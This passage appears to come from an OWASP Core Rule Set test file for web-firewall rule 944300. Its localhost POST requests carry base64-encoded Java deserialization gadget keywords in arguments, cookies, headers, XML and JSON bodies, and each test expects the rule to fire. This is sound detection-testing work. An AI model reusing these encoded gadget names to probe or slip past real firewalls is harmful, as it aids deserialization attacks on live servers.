Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-235 + desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-236 + desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-237 + desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-238 + desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-239 + desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-240 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-241 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-242 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-243 + desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-244 + desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-245 + desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-246 + desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-247 + desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-248 + desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-249 + desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-250 + desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-251 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-252 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-253 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-254 + desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-255 + desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-256 + desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-257 + desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-258 + desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-259 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-260 + desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-261 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-262 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-263 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-264 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-265 + desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-266 + desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-267 + desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-268 + desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-269 + desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-270 + desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-271 + desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-272 + desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-273 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-274 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-275 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-276 + desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-277 + desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-278 + desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-279 + desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-280 + desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-281 + 